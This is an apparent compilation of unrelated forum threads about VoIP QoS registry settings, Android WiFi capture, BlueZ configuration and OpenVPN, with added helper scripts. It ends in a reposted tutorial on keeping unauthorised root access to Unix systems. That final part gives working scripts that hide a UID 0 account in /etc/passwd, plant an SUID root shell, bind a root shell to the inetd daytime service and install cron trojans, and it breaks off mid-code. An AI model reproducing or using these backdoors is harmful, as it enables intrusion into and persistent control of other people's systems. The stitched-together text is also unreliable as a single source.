VoIP SIP Client RTC Registry settings & QoS? - 8125, K-JAM, P4300, MDA Vario ROM Development

On this page: http://msdn2.microsoft.com/en-us/library/aa926591.aspx it lists the default DSCP settings used by the RTC Client in Windows Mobile 6. The default DSCP value for SIP signalling and RTP media is 0x38 (or DSCP 56, IP Precedence 7). I wish to change this; however, adding the relevant values to the registry does not change which DSCP values are set; they always remain at 0x38:
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\Comm\RTC\QoS]
"Disabled"=dword:00000000
"DSCPSIP"=dword:00000018
"DSCPAudioRTP"=dword:0000002e
"DSCPAudioRTCP"=dword:0000002e
This should in theory set DSCP 24 (0x18) for SIP signalling packets and DSCP 46 (0x2e) for RTP & RTCP packets. I have made the registry changes, left it for a while and soft-reset. Following bootup I have checked that the settings are stored in the registry; however, if I make a call and capture the traffic I can still only see DSCP being set to 56 (0x38). Has anyone else played around with the QoS settings?
I am using version 5.2.318 (Build 15342) with the replacement VoIP files to get around the issue with L2TP/IPSec.
Andy
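A quick way to check what actually left the device against what the registry asked for, as an added example (not from the original post): it parses the REGEDIT4 export quoted above and reads the DSCP out of the IPv4 DS byte of a captured packet. The IPv4 headers are constructed here, and which captured packet belongs to which flow (SIP vs RTP/RTCP) is assumed to be known from the capture.

```python
"""Compare the DSCP marking of captured IPv4 packets with the values an RTC
QoS registry export asks for (DSCPSIP, DSCPAudioRTP, DSCPAudioRTCP).

Added example, not from the original post: the registry export text is the one
quoted in the thread, the IPv4 headers are constructed here."""
import re

# Well-known DSCP code points (RFC 2474 class selectors, RFC 3246 EF).
DSCP_NAMES = {0: "CS0", 8: "CS1", 16: "CS2", 24: "CS3", 32: "CS4",
              40: "CS5", 46: "EF", 48: "CS6", 56: "CS7"}

# Registry export as posted in the thread (REGEDIT4 format).
REG_EXPORT = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\Comm\RTC\QoS]
"Disabled"=dword:00000000
"DSCPSIP"=dword:00000018
"DSCPAudioRTP"=dword:0000002e
"DSCPAudioRTCP"=dword:0000002e
"""


def parse_reg_dscp(reg_text):
    """Return {value_name: int} for the dword values under [HKLM\\Comm\\RTC\\QoS]."""
    values, in_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.lower() == r"[hkey_local_machine\comm\rtc\qos]"
            continue
        m = re.match(r'"(\w+)"=dword:([0-9a-fA-F]{8})$', line)
        if in_key and m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def dscp_of(ipv4_header):
    """DSCP is the top six bits of the DS byte (octet 1); the low two bits are ECN."""
    if len(ipv4_header) < 20 or ipv4_header[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    return ipv4_header[1] >> 2


def describe(dscp):
    return "%d (0x%02x, %s)" % (dscp, dscp, DSCP_NAMES.get(dscp, "unnamed"))


def build_ipv4_header(dscp, proto=17):
    """Constructed 20-byte IPv4 header carrying `dscp`; checksum left zero (unused here)."""
    tos = (dscp & 0x3F) << 2
    return bytes([0x45, tos, 0x00, 0x3C, 0x00, 0x01, 0x40, 0x00, 0x40, proto,
                  0x00, 0x00, 192, 168, 1, 10, 192, 168, 1, 20])


def audit_marking(reg_text, captured):
    """captured: {value_name: ipv4_header bytes}, one representative packet per flow.
    Returns {value_name: (expected, observed, ok)}."""
    wanted = parse_reg_dscp(reg_text)
    if wanted.get("Disabled", 0):
        raise ValueError("QoS marking is disabled in the registry; nothing to compare")
    result = {}
    for name, header in captured.items():
        expected = wanted.get(name)
        if expected is None:
            continue  # no registry value for this flow: the stack default applies
        observed = dscp_of(header)
        result[name] = (expected, observed, expected == observed)
    return result


if __name__ == "__main__":
    # What the poster saw: every flow still marked CS7 (0x38) despite the registry.
    seen = {n: build_ipv4_header(0x38) for n in ("DSCPSIP", "DSCPAudioRTP", "DSCPAudioRTCP")}
    for name, (exp, obs, ok) in audit_marking(REG_EXPORT, seen).items():
        print("%-14s wanted %s, saw %s -> %s" % (name, describe(exp), describe(obs),
                                                  "OK" if ok else "MISMATCH"))
```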

VoipSipSdk
I am now looking for voip solutions. And found information about Voip sdk.
According to their website www.voipsipsdk.com
Voip sdk is based on IETF standards (SIP, STUN, etc.), so it should be compatible with other standards-based products such as Asterisk, OpenSER and others.
They have all features I need:
# Dynamically loadable codecs
# Registrar support
# Play wav files into conversation
# Record conversation into file
# Hold/Retrieve call
# Forward Call (Blind Call Transfer)
# Transfer Call (Attended Transfer)
# Mute Sound
# VPN support
# Noise reduction
# Auto gain
# Jitter buffer parameters
# Samples on Delphi, C#, VB, VB.NET, C++ 2005, C++ 6.0, HTML (SIP ActiveX)
# Windowless samples on C++ and .NET
# DTMF
# Adaptive silence detection
# Adaptive jitter buffer
# STUN support
# Comes as ActiveX control
But before I download the evaluation version I would like to hear about other people's experience.


[Q] ability to access WiFi 802.11 stack and radio headers?

Hi all,
I've been digging around to try and gain the ability to access the WiFi stack from a rooted Android device. What I am interested in is capturing the 802.11 radio headers. I've done a bunch of searching, and it seems like getting the card into promiscuous/monitor mode is out of the question. I haven't been able to find anyone who has done it. But, even without being in this mode I am wondering if it is possible to get 802.11 headers.
I've downloaded the android-wifi-tether project to get the tools it has pre-built and installed on the file system, such as iwconfig, and I've also installed tcpdump.
I cannot get the card into monitor mode, as was expected:
Code:
# ./iwconfig tiwlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device tiwlan0 ; Operation not supported on transport endpoint.
That's fine. But when I use tcpdump, it seems as though the lowest layer of information available is the Ethernet/IP information:
Code:
# /data/tcpdump -i tiwlan0 -L
tcpdump: WARNING: can't create rx ring on packet socket 3: 92-Protocol not available
Data link types (use option -y to set):
DOCSIS (DOCSIS) (printing not supported)
EN10MB (Ethernet)
So for example, if I tcpdump:
Code:
07:51:21.793444 IP 192.168.1.103.34528 > 64.233.169.193.443: Flags [S], seq 3412091441, win 5840, options [mss 1460,sackOK,TS[|tcp]>
07:51:22.096239 IP 64.233.169.193.443 > 192.168.1.103.34528: Flags [S.], seq 513767123, ack 3412091442, win 5672, options [mss 1430,sackOK,TS[|tcp]>
Has anyone been able to dig any lower in the networking stack?
Thanks!
George
OK, I've done a significant amount of digging, and luckily the TI wl1271 wireless driver is built as a kernel module (I'm using a Droid 1). The "dmesg" output provides some hints that the TIWLAN module is active and parsing incoming packets at the lower layer:
Code:
<6>[ 5940.231292] TIWLAN: 3835.067243: rx , ERROR: rxData_receivePacketFromWlan() : MLME returned error
The code for this function can be found here, and even better, the low-level packet information (e.g., RSSI) is available in this function:
Code:
/*
* Set rx attributes
*/
RxAttr.channel = pRxParams->channel;
RxAttr.packetInfo = pRxParams->flags;
RxAttr.ePacketType= pRxParams->packet_class_tag;
RxAttr.Rate = appRate;
RxAttr.Rssi = pRxParams->rx_level;
RxAttr.SNR = pRxParams->rx_snr;
RxAttr.status = pRxParams->status & RX_DESC_STATUS_MASK;
I'm also wondering whether or not it might be possible to drop the card into promiscuous mode with some driver hacking. It appears to be possible through the RX filter, albeit maybe not supported by the actual firmware (that would suck):
Code:
#define RX_CFG_PROMISCUOUS 0x0008 /* promiscuous - receives all valid frames */
#define RX_CFG_BSSID 0x0020 /* receives frames from any BSSID */
#define RX_CFG_MAC 0x0010 /* receives frames destined to any MAC address */
#define RX_CFG_ENABLE_ONLY_MY_DEST_MAC 0x0010
I too want to capture WiFi packet headers on Android using tcpdump. I am using an HTC dream phone (Android 1.6, Wi-Fi (802.11b/g) using a Texas Instruments WL1251B chipset). The default TI driver filters the 802.11 packet headers while doing a packet capture on the device using tcpdump. Did you figure out a way to capture the 802.11 headers using the default TI driver?
Also, I was looking at installing a mac80211 based driver on an android device. I followed the instructions to create the kernel modules and loaded them up on the phone. But, I could not activate the WiFi interface after doing so (though I saw the "wlan0" interface indicating that the mac80211 driver was loaded).
So, I am stuck at this point. Can you provide some directions from here?
Thanks
Ashish

AOSP on Pandaboard, BlueZ config

Hi everybody,
I'm developing on a Pandaboard ES. I compiled AOSP 4.0.4 and a kernel from scratch, and everything is working quite well so far.
As I need to connect some weird bt-devices I have to change the default bt-class.
This is what I get from hciconfig -a:
Code:
/ # hciconfig -a
hci0: Type: BR/EDR Bus: UART
BD Address: 1C:E2:XX:XX:XX:XX ACL MTU: 1021:4 SCO MTU: 180:4
UP RUNNING PSCAN
RX bytes:2148 acl:0 sco:0 events:92 errors:0
TX bytes:1472 acl:0 sco:0 commands:92 errors:0
Features: 0xff 0xfe 0x2d 0xfe 0xdb 0xff 0x7b 0x87
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF
Link mode: SLAVE ACCEPT
Name: 'BlueZ'
Class: 0x1a0000
Service Classes: Networking, Capturing, Object Transfer
Device Class: Miscellaneous,
HCI Version: 4.0 (0x6) Revision: 0x0
LMP Version: 4.0 (0x6) Subversion: 0x1f22
Manufacturer: Texas Instruments Inc. (13)
By default there is no main.conf in /etc/bluetooth/. But I can find two different ones in the sources from where I'm compiling.
1: /external/bluetooth/bluez/src/main.conf
2: /system/bluetooth/data/main.conf
I modified one, pushed it to the pandaboard and rebooted, but the file is ignored. Neither the class nor the name change as expected.
Changing the class with hcitool works, but this is, of course, not permanent. (When changing the class I can connect my "weird" device without problems.)
Why is the file ignored? File owner and rights are the same as on my Nexus S, where the file exists. (Unfortunately I can't check if it's really parsed there, because it's my production phone, so it is unrooted and stock 4.0.4.)
Below you find the content of /etc/bluetooth and main.conf which I pushed to the pandaboard.
Code:
/ # ls -al /etc/bluetooth/
-r--r----- bluetooth bluetooth 1699 2012-05-11 10:31 audio.conf
-rw-r----- system system 1536 2012-05-11 10:31 auto_pairing.conf
-r--r--r-- net_bt net_bt 401 2012-05-11 10:31 blacklist.conf
-r--r----- bluetooth bluetooth 262 2012-05-11 10:31 input.conf
-r--r--r-- bluetooth bluetooth 2802 2012-06-25 09:44 main.conf
-r--r----- bluetooth bluetooth 120 2012-05-11 10:31 network.conf
Code:
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adapter name
# %h - substituted for hostname
# %d - substituted for adapter id
Name = "Panda"
# Default device class. Only the major and minor device class bits are
# considered.
Class = 0x400210
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 120
# How long to stay in pairable mode before going back to non-discoverable
# The value is in seconds. Default is 0.
# 0 = disable timer, i.e. stay pairable forever
PairableTimeout = 0
# Use some other page timeout than the controller default one
# which is 16384 (10 seconds).
PageTimeout = 8192
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Default is 30.
DiscoverSchedulerInterval = 30
# What value should be assumed for the adapter Powered property when
# SetProperty(Powered, ...) hasn't been called yet. Defaults to true
InitiallyPowered = true
# Remember the previously stored Powered state when initializing adapters
RememberPowered = true
# Use vendor, product and version information for DID profile support.
# The values are separated by ":" and VID, PID and version.
DeviceID = android:generic:1.5
# Do reverse service discovery for previously unknown devices that connect to
# us. This option is really only needed for qualification since the BITE tester
# doesn't like us doing reverse SDP for some test cases (though there could in
# theory be other useful purposes for this too). Defaults to true.
ReverseServiceDiscovery = true
# Enable name resolving after inquiry. Set it to 'false' if you don't need
# remote devices name and want shorter discovery cycle. Defaults to 'true'.
NameResolving = true
# Enable runtime persistency of debug link keys. Default is false which
# makes debug link keys valid only for the duration of the connection
# that they were created for.
DebugKeys = false
# Enable Low Energy support if the dongle supports. Default is false.
# Enable/Disable interleave discovery and attribute server over LE.
EnableLE = false
# Enable the GATT Attribute Server. Default is false, because it is only
# useful for testing. Attribute server is not enabled over LE if EnableLE
# is false.
AttributeServer = false
# The link policy for connections. By default it's set to 0x000f which is
# a bitwise OR of role switch(0x0001), hold mode(0x0002), sniff mode(0x0004)
# and park state(0x0008) are all enabled. However, some devices have
# connection stability issue or fail to setup SCO when the link is in park
# state, which requires park state bit cleared.
DefaultLinkPolicy = 0x000f
bump
Nobody has an idea?
Bumping this a last time as this topic is still not solved.
Any help would be great.
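To see which part of a configured Class bluetoothd can actually apply (the comment in main.conf says only the major and minor device class bits are considered), here is an added decoder, not from the original post, that splits a CoD into service bits, major and minor class and compares the 0x1a0000 shown by hciconfig with the 0x400210 in the pushed main.conf. The class-name tables follow the Bluetooth SIG assigned numbers; minor names are included only for the Computer and Phone majors.

```python
"""Decode a Bluetooth Class of Device (CoD) into its three parts: service-class
bits (23..13), major device class (12..8) and minor device class (7..2).

Added example, not from the original post. Names follow the Bluetooth SIG
baseband assigned numbers; minor-class tables are included only for the
Computer and Phone majors, other minors are reported numerically."""
import re

SERVICE_BITS = {13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
                18: "Rendering", 19: "Capturing", 20: "Object Transfer",
                21: "Audio", 22: "Telephony", 23: "Information"}

MAJOR_CLASSES = {0: "Miscellaneous", 1: "Computer", 2: "Phone",
                 3: "LAN/Network Access Point", 4: "Audio/Video", 5: "Peripheral",
                 6: "Imaging", 7: "Wearable", 8: "Toy", 9: "Health", 31: "Uncategorized"}

MINOR_CLASSES = {
    1: {0: "Uncategorized", 1: "Desktop workstation", 2: "Server-class computer",
        3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA", 6: "Wearable computer"},
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}

# main.conf's own comment: "Only the major and minor device class bits are considered."
DEVICE_CLASS_MASK = 0x1FFC


def decode_cod(cod):
    """Split a 24-bit CoD (format type 1, low two bits 00) into named fields."""
    if cod < 0 or cod > 0xFFFFFF or cod & 0x3:
        raise ValueError("CoD must be 24 bits with format-type bits 1:0 == 00: 0x%x" % cod)
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    return {
        "services": [name for bit, name in sorted(SERVICE_BITS.items()) if cod & (1 << bit)],
        "major": MAJOR_CLASSES.get(major, "Reserved (%d)" % major),
        "minor": MINOR_CLASSES.get(major, {}).get(minor, "minor %d" % minor),
        # The part of a configured Class that bluetoothd applies; the service
        # bits it advertises come from the profiles it registers, not from here.
        "device_class_bits": cod & DEVICE_CLASS_MASK,
    }


def class_from_main_conf(conf_text):
    """Return the Class value from a BlueZ main.conf [General] section, or None."""
    section = None
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.startswith("["):
            section = line.strip("[]").lower()
            continue
        m = re.match(r"Class\s*=\s*(0x[0-9a-fA-F]+|\d+)$", line)
        if m and section == "general":
            return int(m.group(1), 0)
    return None


def compare(observed, configured):
    """Decode both values and say whether the configured device-class bits took effect."""
    return {
        "observed": decode_cod(observed),
        "configured": decode_cod(configured),
        "device_class_applied": (observed & DEVICE_CLASS_MASK) == (configured & DEVICE_CLASS_MASK),
    }


if __name__ == "__main__":
    # hciconfig showed 0x1a0000; the pushed main.conf asked for 0x400210.
    report = compare(0x1a0000, 0x400210)
    for side in ("observed", "configured"):
        d = report[side]
        print("%-10s %s / %s / %s" % (side, ", ".join(d["services"]) or "-", d["major"], d["minor"]))
    print("device class from main.conf applied:", report["device_class_applied"])
```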

[Q] OpenVPN and Cyanogenmod 7.2 (need troubleshooting suggestions)

I also posted this on the OpenVPN forums but figured someone here may have experienced a similar problem or at least have ideas for what to do next.
My goal is to be able to connect my android phone via OpenVPN to my home network.
I started by installing OpenVPN 2.2.2
My config folder looks like this:
Code:
ca.crt
dh1024.pem
server.crt
server.key
server.ovpn
My server.ovpn contains:
Code:
# Suppose that you want to enable different
# firewall access policies for different groups
# of clients. There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
# group, and firewall the TUN/TAP interface
# for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
# modify the firewall in response to access
# from different clients. See man
# page for more info on learn-address script.
;learn-address ./script
# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"
# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses. CAVEAT:
# The addresses below refer to the public
# DNS servers provided by opendns.com.
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"
# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client
# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names. This is recommended
# only for testing purposes. For production use,
# each client should have its own certificate/key
# pair.
#
# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
;duplicate-cn
# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120
# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
# openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES
# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo
# The maximum number of concurrently connected
# clients we want to allow.
;max-clients 100
# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
;user nobody
;group nobody
# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun
# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status openvpn-status.log
# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it. Use one
# or the other (but not both).
;log openvpn.log
;log-append openvpn.log
# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 6
# Silence repeating messages. At most 20
# sequential messages of the same message
# category will be output to the log.
;mute 20
I used this to generate a .p12 for my phone.
Code:
openssl.exe pkcs12 -export -in phone.crt -inkey phone.key -certfile ca.crt -name phone -out phone.p12
My port is forwarded correctly and the software firewall is disabled.
This is what I get in the log.
pastebin: gPCBwWE1
And then the connection reset by peer will simply repeat.
I have tried tcp, different ports, recreating keys and directly connecting my comp to the internet.
Any suggestions on where to go from here would be helpful.
I have tried Googling quite a bit but there isn't much out there.
Thanks.
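Before chasing the connection resets, it is worth seeing which of the sample config's own hardening recommendations are actually active. The checker below is an added example, not the poster's code: it separates active directives from the ';'/'#' commented ones and reports on tls-auth, cipher, compression, user/group, duplicate-cn and verb; the excerpt it runs on is constructed with the same active directives as the posted server.ovpn.

```python
"""Review an OpenVPN 2.x server config for the hardening directives the stock
sample config comments on (tls-auth, cipher, user/group, comp-lzo, duplicate-cn,
verb), distinguishing active lines from ';'/'#' commented ones.

Added example, not part of the original post. The finding texts restate the
sample config's own comments; the excerpt below is constructed with the same
active and commented directives as the posted server.ovpn."""
import shlex

POSTED_EXCERPT = """
;learn-address ./script
;push "redirect-gateway def1 bypass-dhcp"
;duplicate-cn
keepalive 10 120
;tls-auth ta.key 0 # This file is secret
;cipher BF-CBC        # Blowfish (default)
;cipher AES-128-CBC   # AES
comp-lzo
;max-clients 100
;user nobody
;group nobody
persist-key
persist-tun
status openvpn-status.log
verb 6
;mute 20
"""


def parse_openvpn(text):
    """Map each active directive to the list of argument lists it was given.
    Lines starting with ';' or '#' are comments; '#' also starts an inline comment."""
    active = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(";"):
            continue
        parts = shlex.split(line)
        active.setdefault(parts[0], []).append(parts[1:])
    return active


def review(active):
    """Return a list of findings; an empty list means none of the checks fired."""
    findings = []
    if "tls-auth" not in active and "tls-crypt" not in active:
        findings.append("tls-auth/tls-crypt not enabled: control-channel packets carry no HMAC, "
                        "so unauthenticated UDP floods reach the TLS stack")
    cipher = active.get("cipher", [[]])[0]
    if not cipher:
        findings.append("no cipher directive: the BF-CBC default applies (64-bit block cipher)")
    elif cipher[0].upper().startswith(("BF-", "DES-")):
        findings.append("cipher %s is a 64-bit block cipher; prefer AES" % cipher[0])
    compress = active.get("compress", [])
    if "comp-lzo" in active or any(a and a[0] in ("lzo", "lz4", "lz4-v2") for a in compress):
        findings.append("compression enabled on the tunnel; disable unless really needed")
    if "user" not in active or "group" not in active:
        findings.append("user/group not set: the daemon keeps its start-up privileges "
                        "after initialization (only acceptable on Windows)")
    if "duplicate-cn" in active:
        findings.append("duplicate-cn: clients may share a certificate; testing only")
    verb = active.get("verb", [["3"]])[0]
    if verb and verb[0].isdigit() and int(verb[0]) >= 5:
        findings.append("verb %s: debug-level logging; lower it once troubleshooting is done" % verb[0])
    return findings


if __name__ == "__main__":
    for finding in review(parse_openvpn(POSTED_EXCERPT)):
        print("-", finding)
```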

#a backdoor into unix/linux os;

I thought this was an interesting paper written by an unknown author.
You've been at it all night, trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. After seemingly endless effort you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (if you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Be familiar with passwd file formats (including the general 7-field
format, system-specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful when you need to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of re-entry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice... but, hey, this *is* the overt section. I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An alternative to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local re-entry from any account on the system,
they offer re-entry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list of crontabs is usually located. Here, you have
several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31), month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
